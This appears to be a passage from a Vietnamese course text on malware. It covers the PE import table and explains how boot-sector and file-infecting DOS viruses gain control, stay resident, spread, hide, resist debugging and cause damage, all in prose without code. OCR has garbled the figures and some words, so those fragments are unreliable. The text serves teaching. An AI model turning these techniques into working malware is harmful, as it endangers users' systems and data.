là cũng là RVA trỏ tới hàm được import, mảng này không thay đổi, đây 
là một trường quan trọng). 

Và thành phần quan trọng tiếp theo là FirstThunk là một mảng 
RVA trỏ tới cấu trúc của IMAGE_THUNK_DATA( một bảng sao của 
mảng đầu tiên). Mảng này bị thay đổi khi loader load PE file sẽ viết lại 
các dia chỉ thật của các function được import. 

Trong file trên đĩa IMAGE THUNK DATA chứa số thứ tự của 
imported function hoặc là một RVA tới một cấu trúc của 
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IMAGE IMPORT BY NAME. Một khi đã được nạp một cau trúc sẽ 
trỏ tại FristThunk được viết đè lên bằng địa chỉ của các hàm import 
function, việc nay trở thành Import Address Table. 

Trong mỗi cấu trúc của IMAGE IMPORT BY NAME, gồm có 2 
thành phan chính: 

Hint chứa chỉ muc( index) bên trong bang EAT của file DII các 
hàm hiện có trong đó. 

Namel bao gồm tên của imported fuction. Tên là 1 null- 
terminated ASCII string. Kích thước của Namel được định nghĩa là 1 
byte, nhưng trên thực tế trường này là một trường có kích thước thay đổi. 

Những thành phan quan trọng nhất là tên imported DII và các 
mang cấu trúc IMAGE THUNK DATA. Mỗi cấu trúc của nó tương ứng 
với một import function từ DI Các mang được trỏ tới bởi 
OriginalFristThunk và FristThunk chạy song song và được kết thúc bằng 
một Null DWORD. 


Overwritten by PE loadeg 


Image. IMAGE IMPORT BY NAME ` |mage_ Adress of 
Thunk Thunk_ GetMess- 
Data [2E E Data "age 


p ^ GetMessaje Image... Adress of 
H. Thunk Loadloon 
Data > n Data 


Image, Loadicon Image... Adress ol 
IMAGE IMPORT DESCRPTOR | {hil n | E 
OrigialFirstThunk Du 7 WW at Message 


Image, TranslateMessage Image Adress of 
Thun IsWindo: 


TimeDateStamp | MM T 


IMPORT IMPORT 
ForwarderChain NAME TABLE Mining ADDRESS 


TABLE 


Data "WS 


Name1 "USER32,0LL" 
FirstThunk 


Additional 
MAGE IMPORT DESCRIPTORS 
for other DLLs, as necessary 


Hình 2-26: Cấu trúc Import Table 
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Ngoai các công cụ xem được cau trúc của PE header, nhóm cũng có san 
phẩm nhỏ dé đọc hiểu PE, load 1 file bất kì vào và quan sát thành phan 
bảng import table trên chương trình nhóm viết dùng để đọc: 


wm ¬ 
xem cụ ace TTT ` 


ChonFile C: SLIIsersMinhSD esktop*keygen. exe 


kernel32. dll 00002248 00002008 0000208 
comctl32. dll ñ00022EC 00002000 000020C0 


« | 


ThunkRVA ThunkValue |Hn | | | 


000020E 4 o000214E 00000184 Loadicon4, 

000020E8 00002186A, 00000190D MessageBox4, 
o00020EC 00002108 00000182 OpenClipboard A 
o00020F0 000021D8 000001DD SendDigltemMessag = 
o00020F 4 00002140 00000180 LoarlCursorẻ, 
o00020F8 000021FE 000001F1 SetClipboardD ata 
o00020FC 00002212 000001F3 SetCursor 

00002100 ñ000221E 000001F8 SetDigltemT extå, 
00002104 00002230 00000021D SetwindowLongA 
00002108 0000218E oooo00F 4 GetDigltemT exté, 
0000210C 00002180 ññũDũDF2 GetDlaltem 


nionne11n Duinnnmon0 74 NNNNNNA n E Ani 
« | m 


Hình 2-27: Quan sat Import Table với chương trình PE file 


Sinh viên có thé tham khảo thêm các thông tin vé PE file trên một số 
trang như sau: 

http://msdn.microsoft.com/en- 

us/library/windows/hardware/gg463 | 19.aspx 
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2.3 Cơ chế hoạt động của mã độc 
Như đã nói tin học phát triển ngày càng mạnh mẽ thì virus cũng phát triển 
ngày càng đa dạng có thê nói không có loại virus nào là hoàn toàn giông 
nhau. Tuy nhiên các virus luôn có một sô đặc điêm chung nhât định đê dựa 
vào đó người ta có thê phân biệt nó. Có nhiêu cách phân loại khác nhau, phân 
loại theo đôi tượng lây nhiễm thì virus gôm hai loại: 

- B-virus: Virus chi tán công lên Master Boot hay Boot Sector. 

- F-virus: Virus chỉ tan công lên các file kha thi. 
Mặc dù vậy, cách phân chia này cũng không hắn là chính xác. Ngoại lệ vẫn có 


các virus vừa tấn công lên Master Boot (Boot Sector) vừa tan công lên file 
kha thi. 


B-virus 

Phan loai B-virus. 
Đầu tiên hãy xem qua trình khởi động của Quá trình khởi động máy tinh xảy 
ra như sau đối với hệ điều hành Windows. 
Bước 1: Power: Bật máy tính lên 
Bước 2: BIOS: BIOS kiểm tra các thiết bị kết nối, thực hiện quá trình POST 
Bước 3: MBR : MBR hay Master Boot Record sẽ kiểm tra các bootloader 
hoặc các partition trạng thái active. Nếu bootloader có thì sẽ vào phần đó và 
tiếp tục, còn néu không thì chuyển đến phân vùng được chỉ rõ active. 
Bước 4:Active Partition BR: Bootloader của phan vùng active sẽ được kích 
hoạt và nhận quyền điều khiển 
Bước 5 MS WINDOWS: Đối với hệ điều hành Windows sẽ có NTLDR (NT 
Boot Loader) trong hệ thống phân vùng được load và trao quyền điều khiển 
[SYSPART:Anldr] 
Bước 6: NTLDR đọc file ‘boot.ini’ trong 6 C , nếu có nhiều hon 1 hệ điều 
hành thì sẽ có nhiều hiển thị trong file này, sau đó khởi động vào 1 hệ điều 
hành người dùng chon.[SYSPART:\boot.ini] 
Bước 7 : File NTDETECT từ hệ thống phân vùng patition sẽ được load, file 
nảy sẽ tìm kiếm các chương trình. 
Bước 8: tiếp theo sẽ load file kernel của Windows là NTOSKRNL, HAL 
(Hardware Abstraction Layer) từ phân vùng boot 
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[%/systemroot%\system32\ntoskrnl.exe] 
[%systemroot%\system32\config\system] 

Bước 9: Sau đó tiếp theo SYSTEM Hive được tải lên và toàn bộ các trình 
điều khiển khởi động cũng được tải lên. 
[%systemroot%\system32\config\system] 

Bước 10: Sau khi boot loader (NTLOADER) chuyền điều khiển đến Kernel 
(NTOSKRNL) 

Bước 11: Kernel sẽ tải logo hiển thi Windows lên và khởi động các hệ thống 
nhỏ hơn. 

Bước 12: Hệ thống sẽ load SMSS (Session Manager Subsystem Service) với 
độ ưu tiên là 11 và chuyền điều khiến tới nó. 
[%systemroot%\system32\smss.exe] 

Bước 13: SMSS khởi tạo pagefile và các thông tin về registry hives. 

Bước 14: Khởi động windows kernel 32bit là Win32k.sys 
[%systemroot%\system32\WIn32k.sys] 

Bước 15: Khởi tạo CSRSS (Client Server Runtime Sub system) với độ ưu tiên 
là 13 

[%systemroot%\system32\csrss.exe] 

Bước 16: Sau khi khởi động WINLOGON với độ ưu tiên là 13 và chuyển điều 
khiển cho winlogon.exe. [%systemroot%\system32\winlogon.exe] 

Bước I7: WINLOGON sau đó sẽ khởi động LSASS (Local Security 
Authorization Subsystem Service ) với độ ưu tiên là 9 


[%systemroot%\system32\sass.exe | 


Bước 18: WINLOGON sau đó sẽ tải MSGINA (Graphical user Identification 
aNd Authentication) , cái này sẽ hién thị tới người dùng. 
[Yosystemroot%\system32\msgina.dll] 

Bước 19: Tiếp theo hệ thống sé tải tiếp SERVICES (Services Controller) với 
động ưu tiên là . 

[%systemroot%\system32\servIces.exe] 

Bước 20: Khi người dùng đăng nhập vào ,SERVICES giành lấy quyền điều 


khiên và tải toàn bộ các dịch vụ cân thiệt cho người dùng. 
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SYSPART: C hoặc C driver (phân vùng hệ thông) 

BOOTPART = phân vùng khởi động 

%systemroot% = BOOTPART:\WINDOWS 

Default Priority (Windows ) = (Normal) 8 [1-15] 

Toàn bộ các tién trình được khởi động trong quá trình Windows khởi động sẽ 
do user SYSTEM làm chủ sở hữu tiến trình. 


2.3.1 Quá trình khởi động máy tính 


Như chúng ta đã biết, sau quá trình POST, sector đầu tiên trên đĩa A hoặc đĩa 
C được đọc vào vùng nhớ tai 0: 7C00, và quyền điều khiển được trao cho 
đoạn mã trong sector khởi động này. B-virus hoạt động bằng cách thay thế 
đoạn mã chuẩn trong sector khởi động này bằng đoạn mã của nó để chiếm 
quyền điều khiến, sau khi đã cài đặt xong mới đọc sector khởi động chuẩn 
được virus cất giữ ở đâu đó vào 0:7C00 và trả lại quyền điều khiển cho đoạn 
mã chuẩn này. Việc cất giữ sector khởi động tại vị trí nao trên đĩa tuỳ thuộc 
loại đĩa và cách giải quyết của từng loại virus. Đối với đĩa cứng, thông thường 
nó được cất giữ ở đâu đó trong Side 0, Cylinder 0 vì trong cả track này, DOS 
chỉ sử dụng sector đầu tiên cho bảng Partition. Trên đĩa mềm, vị trí cat gift sẽ 
phức tap hơn vi mọi chỗ đều có kha năng bị ghi dé thông tin. Một số hướng 
sau đây đã được các virus áp dụng: 


- Sü dụng sector ở cuối Root Directory, vì nó thường ít được sử dụng. 

- Str dung các sector cuối cùng trên đĩa, vi khi phân bó vùng trống cho 
file, DOS tìm vùng trông từ nhỏ đên lớn cho nên vùng này thường ít 
được sử dụng. 

- Ghi vào vùng trống trên đĩa, đánh dấu trong bảng FAT vùng này là 
vùng bị hỏng đê DOS không sử dụng câp phát nữa. Ccáh làm này an 
toàn hơn các cách làm trên đây. 

- Format thêm track và ghi vào track vừa được Format thêm. 

Tùy thuộc vào độ lớn của đoạn mã virus mà B-virus được chia thành hai loại: 
2.3.1.1 SB-virus 


Chương trình cua SB-virus chỉ chiêm đúng một sector khởi động, các tác vụ 
của SB-virus không nhiêu và tương đôi đơn giản. Hiện nay sô các virus loại 
này thường ít gặp và có lẽ chỉ là các virus do trong nước "san xuât”. 
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2.3.1.2 DB-virus 


Đây là những loại virus mà đoạn mã của nó lớn hon 512 byte (thường thay). 
Vì thế mà chương trình virus được chia thành hai phần: 


Phan dau virus: Được cài đặt trong sector khởi động dé chiếm quyên 
điều hiển khi quyền điều khiến được trao cho sector khởi động này. 
Nhiệm vụ duy nhất của phần đầu là: tải tiếp phần thân của virus vào 
vùng nhớ và trao quyền điều khiển cho phần thân đó. Vì nhiệm vụ đơn 
giản như vậy nên phần đầu của virus thường rất ngắn, và càng ngắn 
càng tốt vì càng ngắn thì sự khác biệt giữa sector khởi động chuẩn và 
sector khởi động đã bị nhiễm virus càng ít, giảm khả năng bi nghi ngờ. 


Phần thân virus: Là phần chương trình chính của virus. Sau khi được 
phần đầu tải vào vùng nhớ và trao quyền, phần thân này sẽ tiến hành 
các tác vụ của mình, sau khi tiễn hành xong mới đọc sector khởi động 
chuẩn vào vùng nhớ và trao quyền cho nó dé máy tính làm việc một 
cách bình thường như chưa có gì xảy ra cả. 


2.3.2 Một số kỹ thuật cơ bản của B-virus 


Dù là SB-virus hay DB-virus, nhưng để tòn tại và lây lan, chúng đều có một 
sô các kỹ thuật cơ bản như sau: 


2.3.2.1 Kỹ thuật kiểm tra tính duy nhất 


Virus phải tồn tại trong bộ nhớ cũng như trên đĩa, song sự tồn tại quá nhiều 
bản sao của chính nó trên đĩa và trong bộ nhớ sẽ chỉ làm chậm quá trình Boot 
máy, cũng như chiếm quá nhiều vùng nhớ ảnh hưởng tới việc tải và thi hành 
các chương trình khác đồng thời cũng làm giảm tốc độ truy xuất đĩa. Chính vì 
thế, kỹ thuật này là một yêu cầu nghiêm ngặt với B-virus.Việc kiểm tra trên 
dia có hai yêu tố ảnh hưởng: 


Thứ nhất là thời gian kiểm tra: Nếu mọi tác vụ đọc/ghi đĩa đều phải 
kiểm tra đĩa thì thời gian truy xuất sẽ bi tăng gap đôi, lam giam tốc độ 
truy xuất cũng như gia tăng mỗi nghỉ ngờ. Đối với yêu cầu này, các 
virus áp dụng một số kỹ thuật sau: Giảm số lần kiểm tra bằng cách chỉ 
kiểm tra trong trường hop thay đổi truy xuất từ ô đĩa này sang 6 đĩa 
khác, chỉ kiểm tra trong trường hợp bảng FAT trên đĩa được đọc vào. 


Thứ hai là kỹ thuật kiểm tra: Hầu hết các virus đều kiểm tra bằng giá trị 
từ khoá. Mỗi virus sẽ tạo cho mình một giá trị đặc biệt tại một vị trí xác 
định trên đĩa, việc kiểm tra được tiễn hành bằng cách đọc Boot record 
và kiểm tra giá trị của từ khoá này. Kỹ thuật này gặp trở ngại vì số 
lượng B-virus ngày một đông dao, mà vi trí trên Boot Record thì có 
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hạn. Cách khắc phục hiện nay của các virus là tăng só lượng mã lệnh 
cần so sánh để làm giảm khả năng trùng hợp ngẫu nhiên. Để kiểm tra 
sự tòn tại của minh trong bộ nhớ, các virus đã áp dụng các kỹ thuật sau: 
Đơn giản nhất là kiểm tra giá tri Key value tai một vi trí xác định trên 
vùng nhớ cao, ngoài ra một kỹ thuật khác được áp dụng đối với các 
virus chiếm ngắt Int 21 của DOS là yêu cầu thực hiện một chức năng 
đặc biệt không có trong ngắt này. Nếu cờ báo lỗi được bật lên thì trong 
bộ nhớ chưa có virus, ngược lại nếu virus đã lưu trú trong vùng nhớ thì 
giá tri trả lai (trong thanh ghi AX chắng hạn) là một giá trị xác định nào 
đó. 
2.3.2.2 Kỹ thuật lưu trú 


Sau khi thực hiện xong chương trình POST, giá trị tổng só vùng nhớ vừa 
được Test sẽ được lưu vào vùng BIOS Data ở địa chỉ 0:413h. Khi hệ điều 
hành nhận quyền điều khiến, nó sé coi vùng nhớ mà nó kiểm soát là giá trị 
trong địa chỉ này. Vì vậy để lưu trú, mọi B-virus đều áp dụng kỹ thuật sau 
đây: Sau khi tải phần lưu trú của mình lên vùng nhớ cao, nó sẽ giảm giá trị 
vùng nhớ do DOS quản lý tại 0:413h đi một lượng đúng bằng kích thước của 
virus. Tuy nhiên néu không kiểm tra tốt sự có mặt trong vùng nhớ, khi bị Boot 
mềm liên tục, giá trị tổng số vùng nhớ này sẽ bị giảm nhiều lần, ảnh hưởng tới 
việc thực hiện của các chương trình sau này. Chính vì thế, các virus được thiết 
kế tốt phải kiểm tra sự tôn tại của minh trong bộ nhớ, nếu đã có mặt trong bộ 
nhớ thì không giảm dung lượng vùng nhớ nữa. 


2.3.2.2 Kỹ thuật lây lan 


Đoạn mã thực hiện nhiệm vụ lây lan là đoạn mã quan trọng trong chương 
trình virus. Để đảm bảo việc lây lan, virus khống chế ngắt quan trọng nhất 
trong việc doc/ghi vùng hệ thống: đó là ngắt 13h, tuy nhiên dé đảm bảo tốc độ 
truy xuất đĩa, chỉ các chức năng 2 và 3 (doc/ghi) là dẫn tới việc lây lan. Việc 
lây lan bằng cách doc Boot Sector (Master Boot) lên và kiểm tra xem đã bị 
lây chưa (kỹ thuật kiểm tra đã nói ở trên). Nếu sector khởi động đó chưa bị 
nhiễm thì virus sẽ tạo một sector khởi động mới với các tham số tương ứng 
của đoạn mã virus rồi ghi trở lại vào vi trí của nó trên đĩa. Con sector khởi 
động vừa đọc lên cùng với thân của virus (loại DB-virus) sẽ được ghi vào 
vùng xác định trên đĩa. Ngoài ra một số virus còn chiếm ngắt 21 của DOS dé 
lây nhiễm và phá hoại trên các file mà ngắt 21 làm việc. Việc xây dựng sector 
khởi động có đoạn mã của virus phải đảm bảo các kỹ thuật sau đây: 


- Sector khởi động bị nhiễm phải còn chứa các tham số đĩa phục vu cho 
quá trình truy xuât đĩa,đó là bảng tham sô BPB của Boot record hay 
bảng phân chương trong trường hợp Master boot. Việc không bảo toàn 
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sẽ dan dën việc virus mat quyên điều khién hoặc không thé kiểm soát 
được đĩa nêu virus không có mặt trong môi trường. 

Sự an toàn của sector khởi động nguyên thê và đoạn thân của virus 
cũng phải được đặt lên hàng đâu. Các kỹ thuật về vi trí cat giâu chúng 
ta cũng đã phân tích ở các phân trên. 


2.3.2.3 Kỹ thuật che dấu 


Kỹ thuật này ra đời khá muộn về sau này, do khuynh hướng chống lại sự phát 
hiện của người sử dụng và những lập trình viên đối với virus. Vì kích thước 
của virus khá nhỏ bé cho nên các lậptrình viên hoàn toàn có thé dò từng bước 
xem cơ chế của virus hoạt động như thế nào, cho nên các virus tìm mọi cách 
lắt léo để chống lại sự theo dõi của các lập trình viên. Các virus thường áp 
dụng một số kỹ thuật sau đây: 


Có tình viết các lệnh một cách rắc rỗi như đặt Stack vào các vùng nhớ 
nguy hiểm, chiếm và xoá các ngắt, thay đổi một cách lắt léo các thanh 
ghi phân đoạn dé người dò không biết dir liệu lấy từ đâu, thay đối các 
giá trị của các lệnh phía sau dé người sử dụng khó theo dõi. 


Mã hoá ngay chính chương trình của mình để người sử dụng không 
phát hiện ra quy luật, cũng như không thây một cách rõ ràng ngay sự 
hoạt động của virus. 


Ngụy trang: Cách thứ nhật là đoạn mã cài vào sector khởi động càng 
ngăn càng tốt và càng giống sector khởi động càng tốt. Tuy vậy cách 
thứ hai vẫn được nhiều virus áp dụng: Khi máy đang nôm trong quyền 
chi phối của virus, mọi yêu cầu doc/ghi Boot sector (Master boot) đều 
được virus trả về một bản chuẩn: bản trước khi bị virus lây. Điều này 
đánh lừa người sử dụng và các chương trình chống virus không được 
thiết kế tốt néu máy hiện đang chịu sự chi phối của virus. 


2.3.2.4 Kỹ thuật phá hoại 


Đã là virus thì bao giờ cũng có tính phá hoại. Có thể phá hoại ở mức đùa cho 
vui, cũng có thê là phá hoại ở mức độ nghiêm trọng, gây mât mát và đình trệ 
đôi với thông tin trên đĩa. 


Căn cứ vào thời diém phá hoại, có thê chia ra thành hai loại: 


Loại định thời: Loại này lưu giữ một giá trị, giá trị này có thể là ngày 
giờ, số lần lây nhiễm, số giờ máy đã chạy, ... Néu giá trị này vượt quá 
một con số cho phép, nó sẽ tiến hành phá hoại. Loại này thường nguy 
hiểm vì chúng chỉ phá hoại một lần. 
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- Loai liên tục: Sau khi bị lây nhiễm và liên tục, virus tién hành phá hoại, 
song do tính liên tục này, các hoạt động phá hoại của nó không mang 
tính nghiêm trong, chủ yêu là đùa cho vui. 


File chưa phân mảnh trước khi bị tấn công 
File: A File: B 


Hình 2-28 Phá hoại làm file phân mảnh 
2.3.2.5 Kỹ thuật dành quyên điều khuyến của B-virus 


Khi máy tính bắt đầu khởi động (Power on), các thanh ghi phân đoạn đều 
được đặt về OFFFFh,cón mọi thanh ghi khác đều được đặt về 0. Nhu vậy, 
quyền điều khiển ban đầu được trao cho đoạn mã tại 0FFFFh: 0h, đoạn mã 
này thực ra chi là lệnh nhảy JMP FAR đến một đoạn chương trình trong 
ROM, đoạn chương trình này thực hiện quá trình POST (Power On Self Test - 
Tự kiểm tra khi khởi động). 


Quá trình POST sẽ lần lượt kiểm tra các thanh ghi, kiểm tra bộ nhớ, khởi tạo 
các Chip điều khién DMA, bộ điều khiến ngắt, bộ điều khiến đĩa... Sau đó nó 
sẽ dò tìm các Card thiết bi gắn thêm dé trao quyền điều khiến cho chúng tự 
khởi tạo rồi lấy lại quyền điều khiển. Chú ý rông đây là đoạn chương trình 
trong ROM (Read Only Memory) nên không thé sửa đối, cũng như không thé 
chèn thêm một đoạn mã nào khác. 


Sau quá trình POST, đoạn chương trình trong ROM tiến hành đọc Boot Sector 
trên đĩa A hoặc Master Boot trên đĩa cứng vào RAM (Random Acess 
Memory) tại dia chỉ 0:7C00h và trao quyền điều khiển cho đoạn mã đó bang 
lệnh JMP FAR 0:7C00h. Đây là chỗ mà B-virus lợi dụng để tấn công vào 
Boot Sector (Master Boot), nghĩa là nó sẽ thay Boot Sector (Master Boot) 
chuẩn bằng đoạn mã virus, vì thế quyền điều khiến được trao cho virus, nó sẽ 
tién hành các hoạt động của mình trước, rồi sau đó mới tiễn hành các thao tác 
như thông thường: Doc Boot Sector (Master Boot) chuẩn mà nó cất giấu ở 
đâu đó vào 0:7C00h rồi trao quyền điều khiển cho đoạn mã chuẩn này, và 
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người sử dung có cảm giác rông máy tinh của mình vẫn hoạt động bình 
thường. 


2.3.3 Một số kỹ thuật cơ bản của F-virus 


So với B-virus thì số lượng F-virus đông đảo hơn nhiều, có lẽ do các tác vụ 
đĩa với sự hỗ trợ của Int 21 đã trở nên cực kỳ dễ dàng và thoải mái, đó là điều 
kiện phát triển cho các F-virus. Thường thì các F-virus chỉ lây lan trên các file 
khả thi (có đuôi .COM hoặc .EXE), tuy nhiên một nguyên tac mà virus phải 
tuân thủ là: Khi thi hành một file khả thi bị lây nhiễm, quyền điều khiến phải 
nôm trong tay virus trước khi virus trả nó lại cho file bị nhiễm, và khi file 
nhận lại quyền điều khiến, tất cả mọi dữ liệu của file phải được bảo toàn. Đối 
với F-virus, có một số kỹ thuật được nêu ra ở đây: 


Ky thuật lây lan 
Các F-virus chủ yếu sử dụng hai kỹ thuật: thêm vào đầu và thêm vào cuối 
2.3.3.1 Thêm vào đầu file 


Thông thường, phương pháp này chỉ áp dụng cho các file .COM, tức là 
đầu vào của chương trình luôn luôn tại PSP:100h. Loi dụng dau vào có định, 
virus chèn đoạn mã của chương trình virus vào đầu chương trình đối tượng, 
đây toàn bộ chương trình đối tượng xuống phía dưới. Cách này có một nhược 
điểm là do đầu vào có định của chương trình COM là PSP:100, cho nên trước 
khi trả lại quyền điều khiển cho chương trình, phải day lại toàn bộ chương 
trình lên bắt đầu từ offset 100h. Cách lây này gây khó khăn cho những người 
khôi phuc vi phải đọc toàn bộ file vào vùng nhớ rồi mới tiễn hành ghi lại. 


2.3.3.2 Thêm vào cuối file 


Khác với cách lây lan ở trên, trong phương pháp này, đoạn mã của virus sẽ 
được gắn vào sau của chương trình đối tượng. Phương pháp này được thấy 
trên hầu hết các loại virus vì phạm vi lây lan của nó rộng rãi hơn phương pháp 
trên. Do thân của virus không nôm đúng đầu vào của chương trình, cho nên 
dé chiếm quyền điều khiến, phải thực hiện kỹ thuật sau đây: 


Đối với file .COM: Thay các byte đầu tiên của chương trình (đầu vào) bằng 
một lệnh nhảy JMP, chuyên điêu khiên đên đoạn mã của virus. E9 xx xx 
JMP Entry virus. 

Đối với file .EXE: Chỉ cần định vị lại hệ thống các thanh ghi SS, SP, CS, IP 
trong Exe Header dé trao quyền điều khiển cho phan mã virus. 
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File Header 
IP 


: > Start of Program | : p 
: : File dà 


File sach - : 
EndofProgram | E End of Program j nhiễm Virut 


E 
Virus Jump € 


Hinh 2-29 Lay voi file .EXE 


Ngoài hai kỹ thuật lây lan chủ yếu trên, có một số ít các virus sử dung một số 
các kỹ thuật đặc biệt khác như mã hoá phần mã của chương trình virus trước 
khi ghép chúng vao file để ngụy trang, hoặc thậm chí thay thé một số đoạn mã 
ngắn trong file đối tượng băng các đoạn mã của virus, gây khó khăn cho quá 
trình khôi phuc. Khi tiến hành lây lan trên file, đối với các file được đặt các 
thuộc tính Sys (hệ thống), Read Only (chi doc), Hidden (án), phải tién hành 
đổi lai các thuộc tính đó dé có thé truy nhập, ngoài ra việc truy nhập cũng 
thay đổi lại ngày giờ cập nhật của file, vì thé hầu hết các virus đều lưu lại 
thuộc tính, ngày giờ cập nhật của file dé sau khi lây nhiễm sé trả lại y nguyên 
thuộc tính và ngày giờ cập nhật ban đầu của nó.Ngoài ra, việc cố gắng ghi lên 
đĩa mềm có dán nhãn bảo vệ cũng tạo ra dòng thông báo lỗi của DOS: Retry - 
Aboart - Ignoreó, nếu không xử lý tốt thì dé bị người sử dụng phát hiện ra sự 
có mặt của virus. Lỗi kiểu này được DOS kiểm soát bằng ngắt 24h, cho nén 
các virus muốn tránh các thông báo kiểu này của DOS khi tién hành lây lan 
phải thay ngắt 24h của DOS trước khi tiễn hành lây lan rồi sau đó hoan trả. 


2.3.3.3 Kỹ thuật dám báo tính tôn tại duy nhất 


Cũng giống như B-virus, một yêu cầu nghiêm ngặt đặt ra đối với F-virus là 
tính tôn tại duy nhât của mình trong bộ nhớ cũng như trên file. Trong vùng 
nhớ, thông thường các F-virus sử dụng hai kỹ thuật chính: 


Thứ nhất là tạo thêm chức năng cho DOS, bằng cách sử dụng một chức 
năng con nảo đó trong đó đặt chức năng lớn hơn chức năng cao nhất mà 
DOS có. Dé kiểm tra chi cần gọi chức năng này, giá trị trả lại trong 
thanh ghi quyết dinh sự tòn tại của virus trong bộ nhớ hay chưa. 
Cách thứ hai là so sánh mộtđoạn mã trong vùng nhớ ấn định với đoạn mã 
của virus, nếu có sự chênh lệch thì có nghĩa là virus chưa có mặt trong 
vùng nhớ và sẽ tién hành lây lan. Trên file, có thé có các cách kiểm tra 
như kiểm tra bằng test logic nào đó với các thông tin của Entry trong 


76 


thư mục cua file này. Cách này không đảm bao tính chính xác tuyệt đối 
song nếu thiết kế tốt thì khả năng trùng lặp cũng hạn chế, hầu như không 
có, ngoài ra một ưu điểm là tốc thực hiện kiểm tra rất nhanh. Ngoài ra có 
thể kiểm tra bằng cách dò một đoạn mã đặc trưng (key value) của virus 
tại vị trí án dinh nào đó trên file, ví dụ trên các byte cudi cung cua file. 


2.3.3.4 Kỹ thuật lưu trú 


Đây là một kỹ thuật khó khăn, lý do là DOS chỉ cung cấp chức năng 
thường trú cho chương trình, nghĩa là chỉ cho phép cả chương trình 
thường trú. Vì vậy nếu sử dụng chức năng của DOS, chương trình virus 
muốn thường trú thì cả file đối tượng cũng phải thường trú, mà điều này 
thì không thé được néu kích thước của file đối tượng quá lớn. Chính vì lý 
do trên, hầu hết các chương trình virus muốn thường trú đều phải thao 
tác qua mặt DOS trên chuỗi MCB bằng phương pháp "thủ công". Căn cứ 
vào việc thường trú được thực hiện trước hay sau khi chương trình đối 
tượng thi hành, có thể chia kỹ thuật thường trú thành hai nhóm: 


2.3.3.5 Thường trú trước khi trả quyền điều khiển 


Như đã nói ở trên, DOS không cung cấp một chức năng nào cho kiểu 
thường trú này, cho nên chương trình virus phải tự thu xêp. Các cách sau 
đây đã được virus dùng đên: 


- Thao tác trên MCB dé tách một khối vùng nhớ ra khỏi quyền điều 
khiên của DOS, rôi dùng vùng này đê chứa chương trình virus. 


- Tu định vị vị trí trong bộ nhớ dé tai phần thường trú của virus vào, 
thường thì các virus chọn ở vùng nhớ cao, phía dưới phần tạm trú của 
file command.com để tránh bị ghi dé khi hệ thống tải lại 
command.com. Vì không cấp phát bọ nhớ cho phần chương trình virus 
đang thường trú, cho nên command.com hoàn toàn có quyền cấp phát 
vùng nhớ đó cho các chương trình khác, nghĩa là chương trình thương 
trú của virus phải chấp nhận sự mat mát do may rủi. 


- Thuong trú bang chức năng thường trú 31h: Day là một kỹ thuật phức 
tạp, tiễn trình cần thực hiện được mô tả như sau: Khi chương trình virus 
được trao quyền, nó sẽ tạo ra một MCB được khai báo là phần tử trung 
gian trong chuỗi MCB dé chứa chương trình virus, sau đó lại tạo tiếp 
một MCB mới để cho chương trình bị nhiễm bằng cách dời chương 
trình xuống vùng mới này. Để thay đổi PSP mà DOS đang lưu giữ 
thành PSP mà chương trình virus tạo ra cho chương trình đối tượng, 
phải sử dụng chức năng 50h của ngắt 21h. 


SEI 


2.3.3.6 Thường trú sau khi đoạt lại quyền điều khiển 


Chương trình virus lay tên chương trình đang thi hành trong môi trường 
của DOS, rồi nó thi hành ngay chính bản thân mình. Sau khi thi hành 
xong, quyên điều khiến lại được trả vé cho virus, và khi đó nó mới tién 
hành thường trú một cách bình thường bằng chức năng 31h của ngắt 21h. 


2.3.3.7 Kỹ thuật che dấu va gây nhiễu 


Một nhược điểm không tránh khỏi là file đối tượng bị lây nhiễm virus sẽ 
bị tăng kích thước. Một số virus ngụy trang bằng cách khi sử dụng chức 
năng DIR của DOS, virus chi phối chức năng tìm kiếm file (chức năng 
llh và 12h của ngắt 21h) dé giảm kích thước của file bị lây nhiễm 
xuống, vì thế khi virus đang chi phối máy tính, nếu sử dụng lệnh DIR 
của DOS, hoặc các lệnh sử dụng chức năng tìm kiếm file ở trên để có 
thông tin về entry trong bảng thư mục, thì thấy kích thước file bị lây 
nhiễm vẫn bằng kích thước của file ban đầu, điều này đánh lừa người sử 
dụng về sự trong sạch của file này. 


Một số virus còn gây nhiễu bằng cách mã hoá phần lớn chương trình 
virus, chỉ khi nào vào vùng nhớ, chương trình mới được giải mã ngược 
lại. Một số virus anti-debug bằng cách chiếm ngắt ] và ngat 3. Bởi vì các 
chương trình debug thực chất phải dùng ngắt 1 và ngắt 3 để thi hành 
từng bước một, cho nên khi virus chiếm các ngắt này rồi mà người lập 
trình dung debug dé theo dõi virus thì kết quả không lường trước được. 


2.3.3.8 Kỹ thuật phá hoại 


Thông thường, các F-virus cũng sử dụng cách thức và kỹ thuật phá hoại 
giông như B-virus. Có thê phá hoại một cách định thời, liên tục hoặc 
ngẫu nhiên. Đối tượng phá hoại có thé là màn hình, loa, đĩa,... 


2.3.3.9 Kỹ thuật dành quyền điều khuyén của F-virus 


Khi DOS tổ chức thi hành File khả thi (bằng chức năng 4Bh của ngắt 
21h), nó sẽ t6 chức lại vùng nhớ, tai File cần thi hành và trao quyền điều 
khiến cho File đó. F-virus lợi dụng điểm này bang cách gắn đoạn mã của 
minh vào file đúng tại vị trí mà DOS trao quyền điều khiển cho File sau 
khi đã tải vào vùng nhớ. Sau khi F-virus tiến hành xong các hoạt động 
của minh, nó mới sắp xếp, bó tri trả lại quyền điều khiến cho File dé cho 
File lại tiến hành hoạt động bình thường, và người sử dụng thì không thé 
biết được. Trong các loại B-virus và F-virus, có một số loại sau khi dành 
được quyền điều khiến, sẽ tiến hành cài đặt một đoạn mã của minh trong 
vùng nhớ RAM như một chương trình thường trú (TSR), hoặc trong 
vùng nhớ nëm ngoài tam kiểm soát của DOS, nhóm mục đích kiểm soát 
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các ngắt quan trong như ngắt 21h, ngắt 13h,... Mỗi khi các ngắt này được 
goi, virus sẽ dành quyền điêu khiên đê tiên hành các hoạt động của mình 
trước khi trả lại các ngắt chuân của DOS. 


2.4 Các hình thức tan công của mã độc 
Hiện nay có rất nhiều hình thức phat tán mã độc hai, có thé thông 
qua email, thông qua các phần mềm va gan mã độc vao bên trong, 
thông qua các đường link trang Web, thông qua việc chia sẻ file USB, 
thông qua các lỗ hông hệ điều hành , ứng dung. .. 
2.4.1. Phát tán qua email sử dụng file đính kèm 
Cách phát tán mã độc hại lớn nhất qua email hiện nay là các 
hacker đính kèm các tài liệu độc hại vào email bao gồm các loại virus 
lừa dao, spyware, worm...duói các file không rõ nguồn góc, đặc biệt là 
các file có đuôi .exe , Com, .pif, .pdf, ser, bat, .rar, .ZIp... 


& Pdf attatchment - Unicode (UTF-B) 
File Edit View Tools Message Help 


Sei S? ss 


